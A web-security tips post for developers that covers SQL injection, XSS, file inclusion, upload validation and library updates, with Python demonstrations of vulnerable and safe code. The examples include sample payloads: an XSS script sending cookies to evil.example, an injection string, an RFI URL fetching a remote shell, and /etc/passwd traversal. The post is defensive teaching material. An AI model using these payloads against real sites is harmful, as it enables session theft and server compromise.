Almost every day we hear news of another website being hacked. In most of these cases the fault lies in how the website was developed (roughly 70%, with the remaining 30% down to server errors and misconfiguration). To protect a website from attackers, web developers should follow some basic security practices while building it. Companies hire penetration testers to test a website for common vulnerabilities, but companies that do not have the resources for penetration testers should at least follow some common steps to protect their website. A handful of common vulnerabilities are behind most website hacking, and they are known to script kiddies too, so protecting against these common vulnerabilities raises the security level of your website considerably. I am not going into detail on these vulnerabilities. If you want to learn about them in detail, go to Hacking tricks.in (I am no longer managing it). I am going to write down some security steps which a web developer should follow in website development.
Website Security Tips For Web Developers
1. Don’t trust user input
Never trust user input. Always validate the user’s input on the server against what the field is supposed to contain (type, length, allowed characters) and reject anything else. Filtering out characters such as ‘ ” ; # ) = catches only the crudest attacks, and any character blacklist can be bypassed, so treat character filtering as a backstop: the real protection depends on where the data ends up (parameterized queries for SQL, output encoding for HTML, covered in the next tips). Read how to validate a form with jQuery and CSS. You can also use HTML5 form validation, but this only works in modern browsers, and in any case client-side validation is for usability only: an attacker can skip it with any HTTP client, so the server must validate again.
2. Never use form data or query data directly in SQL queries
Never put user input or query-string data directly into SQL queries. Doing so causes SQL injection: by exploiting this vulnerability, an attacker can read your database and even run their own SQL queries in it. Use prepared statements with bound parameters (PDO or mysqli prepared statements in PHP) so that user data is never parsed as SQL. Merely filtering unwanted characters is a weaker, second-best defence, because a numeric field can be injected without any quotes at all. So, you must take care of this.
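The following is an added example, not code from the original post; it is written in Python with SQLite (rather than PHP) so it runs on its own, and the table layout, the user "alice" and the injection payloads are constructed for the demonstration. It covers both tip 1 and tip 2: the login query shows the classic quote-based injection, and the article lookup shows a numeric injection that contains none of the blacklisted characters, which is why type validation plus bound parameters, not character filtering, is the fix.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory SQLite database standing in for the site's DB.

    Passwords are stored in plain text only to keep the demo short; real code
    hashes them (PHP: password_hash()).
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                     [(1, "Public post", 1), (2, "Unpublished draft", 0)])
    return conn


def login_vulnerable(conn, username, password):
    # The mistake the tip warns about: form fields pasted straight into the SQL text.
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Parameterized query: the values travel separately from the SQL text, so a
    # quote in the input is data, never syntax. (PHP: PDO prepare()/execute().)
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def article_vulnerable(conn, article_id):
    # Numeric context: no quotes are needed, so a quote/semicolon blacklist does not help.
    sql = "SELECT title FROM articles WHERE id = %s AND published = 1" % article_id
    return [r[0] for r in conn.execute(sql)]


def article_safe(conn, article_id):
    # Allowlist the type first (decimal digits only), then bind the value.
    if not isinstance(article_id, str) or not article_id.isdigit():
        raise ValueError("article id must be a decimal integer")
    rows = conn.execute(
        "SELECT title FROM articles WHERE id = ? AND published = 1", (int(article_id),))
    return [r[0] for r in rows]


def demo():
    """Run every variant against the sample DB and report the outcomes."""
    conn = make_db()
    try:
        safe_article = article_safe(conn, "2 OR 1")
    except ValueError:
        safe_article = "rejected"
    return {
        # Payload turns the WHERE clause into (... AND password='') OR '1'='1'.
        "login_vulnerable_payload": login_vulnerable(conn, "alice", "' OR '1'='1"),
        "login_safe_payload": login_safe(conn, "alice", "' OR '1'='1"),
        "login_safe_real": login_safe(conn, "alice", "correct horse"),
        # "2 OR 1" becomes id = 2 OR (1 AND published = 1): the draft leaks.
        "article_vulnerable_payload": sorted(article_vulnerable(conn, "2 OR 1")),
        "article_vulnerable_normal": article_vulnerable(conn, "2"),
        "article_safe_payload": safe_article,
        "article_safe_normal": article_safe(conn, "1"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-28s %r" % (name, value))
```

Note that `article_vulnerable` leaks the unpublished draft with the input `2 OR 1`, which contains no quote, semicolon, hash, bracket or equals sign at all; the character list in tip 1 would let it straight through. The safe variants do two things in order: validate the shape of the value, then hand it to the driver as a parameter.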
3. Filter HTML tags and script tags.
Never allow any script supplied by a user to execute in your website. Filtering script tags and function names out of user input is the common advice (see XSS filter PHP function for Web Developers), but tag filters are routinely bypassed with other tags that carry event-handler attributes, so the reliable fix is to encode user data for the context in which it is output (htmlspecialchars() for HTML in PHP) and to treat filtering only as an extra layer. Otherwise you have XSS, which an attacker can use to serve malware, hijack your users’ sessions and perform unwanted redirects in your website. It will also have an impact on the reputation of your website.
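An added example, not from the original post and not the XSS filter function it links to: a Python stand-in for a comment template, with two constructed attacker payloads. It shows why a filter that removes `<script>` tags is not enough (an `<img>` with an `onerror` handler walks straight through) while output encoding neutralizes both payloads. The `active_content` helper uses Python’s own HTML parser to list the tags and `on*` attributes a browser would see in the rendered fragment.

```python
import html
import re
from html.parser import HTMLParser

# Constructed attacker input for a comment field (not from a real incident).
SCRIPT_PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
IMG_PAYLOAD = '<img src=x onerror="alert(document.cookie)">'


def strip_script_tags(text):
    """The 'filter script tags' approach: remove <script>...</script> and nothing else."""
    return re.sub(r"(?is)<script\b[^>]*>.*?</script\s*>", "", text)


def render_filtered(comment):
    # What a filter-then-insert comment template produces.
    return '<p class="comment">%s</p>' % strip_script_tags(comment)


def render_escaped(comment):
    # Output encoding for an HTML text node; same idea as PHP's
    # htmlspecialchars($comment, ENT_QUOTES, 'UTF-8').
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)


class _TagCollector(HTMLParser):
    """Records the tags and on* event-handler attributes a browser would parse."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def active_content(fragment):
    """Return (tags, handlers) parsed from a rendered fragment, ignoring the <p> wrapper."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return ([t for t in parser.tags if t != "p"], parser.handlers)


if __name__ == "__main__":
    for label, payload in (("script", SCRIPT_PAYLOAD), ("img", IMG_PAYLOAD)):
        print(label, "filtered:", active_content(render_filtered(payload)))
        print(label, "escaped: ", active_content(render_escaped(payload)))
```

Running it shows the filter catching the `<script>` payload but leaving an `img` tag with an `onerror` handler in the page, while the escaped output contains no tags at all. Escaping is per context: `html.escape`/`htmlspecialchars` is right for text nodes and quoted attribute values, but data placed inside a `<script>` block, a URL or a CSS value needs the encoding for that context.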
4. Use include or require carefully
In PHP, if you use include or require with a path that depends on user input, take care: an attacker can make your script include a file of their choosing and execute it on your server.
Suppose your site is used as http://www.website.com/index.php?page=article and index.php builds the include path from that parameter (for example include($_GET['page'] . '.php'), which ends up including article.php). Then a request such as http://www.website.com/index.php?page=http://www.hacker.com/hackshell.php pulls in and executes an external PHP script; this is called an RFI (remote file inclusion) vulnerability. The same code is also open to local file inclusion, where the attacker points the parameter at a file already on the server (page=../../../etc/passwd). Keep allow_url_include off in php.ini (it is off by default), which blocks the remote case, and map the page parameter to a fixed list of allowed files instead of building a path from it.
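An added example, not from the original post, written in Python so it runs stand-alone; the page directory `/var/www/site/pages` and the page list are assumptions for the demo. It shows the two ways to resolve a `page` parameter safely: an explicit allowlist (best when the set of pages is small) and, for sites with many pages, a strict name pattern followed by a check that the normalized path still sits inside the page directory. The same logic transfers directly to a PHP `include`.

```python
import posixpath
import re

# Assumed layout for the demo: page templates live under one fixed directory.
PAGES_DIR = "/var/www/site/pages"
ALLOWED_PAGES = {"home": "home.php", "article": "article.php", "contact": "contact.php"}
# Plain page names only: no slashes, dots, colons or control characters.
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def resolve_page_allowlist(page):
    """Preferred: the parameter selects an entry, it never becomes part of a path."""
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        raise ValueError("unknown page: %r" % page)
    return posixpath.join(PAGES_DIR, filename)


def resolve_page_by_name(page):
    """Fallback for large sites: validate the name, then confirm the path stayed put."""
    if not PAGE_NAME.fullmatch(page):
        raise ValueError("bad page name: %r" % page)
    path = posixpath.normpath(posixpath.join(PAGES_DIR, page + ".php"))
    # Belt and braces: even if the pattern were loosened later, a path that
    # resolves outside PAGES_DIR is refused.
    if posixpath.dirname(path) != PAGES_DIR:
        raise ValueError("path escaped pages directory: %r" % path)
    return path


# Constructed inputs: one legitimate page and the usual RFI/LFI attempts.
SAMPLE_INPUTS = [
    "article",
    "http://www.hacker.com/hackshell.php",   # remote file inclusion
    "../../../etc/passwd",                   # directory traversal (local file inclusion)
    "/etc/passwd",                           # absolute path
    "php://input",                           # PHP stream wrapper
    "article\x00",                           # null byte, relevant to old PHP versions
]


def demo(resolver=resolve_page_by_name):
    """Map each sample input to the resolved path or 'rejected'."""
    results = {}
    for page in SAMPLE_INPUTS:
        try:
            results[page] = resolver(page)
        except ValueError:
            results[page] = "rejected"
    return results


if __name__ == "__main__":
    for page, outcome in demo().items():
        print("%-40r -> %s" % (page, outcome))
```

Both resolvers accept only `article` from the sample list. Note what the by-name version does not do: it never tries to strip `../` or `http://` out of the input and then use what is left. Sanitizing a path is how filters get bypassed; validating the name and checking the final location is what holds up.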
5. Validate file uploads properly
When accepting file uploads, validate what the file actually is. If you are expecting images, make sure the file you receive really is an image; otherwise it might be a PHP script that runs on your server and does whatever damage you can imagine. Checking the file extension alone is not enough, and neither is the MIME type sent with the upload: the ['type'] entry in PHP’s $_FILES array is chosen by the client, so it can only be used as a consistency check. Inspect the content on the server side (for example with finfo_file() or getimagesize()) against an allowlist of extensions and types, give the stored file a new name of your own, and keep the upload directory outside the web root or configured so that nothing in it is ever executed.
Most attackers try to upload shell scripts or backdoors through file uploads. If your file upload is not secure, you are going to have a bad time ahead.
If you want a secure image upload, you can check this project on GitHub.
6. Always update third-party libraries used in your application
If you are using any third-party libraries, always check for security updates for them. Many attackers look for outdated libraries used on a website and then use the known vulnerabilities of that library to attack it. WordPress attackers, for example, scan for websites running vulnerable plugins and themes. So never forget to update the plugins, themes and scripts you use. Developers push updates with security fixes as well as new features; even if you do not want the new features, you must update to get the security issues resolved.
If you follow these things while creating a web application, you can make it secure against script kiddies and intermediate-level hackers, and these are the attackers who are most active on the Internet.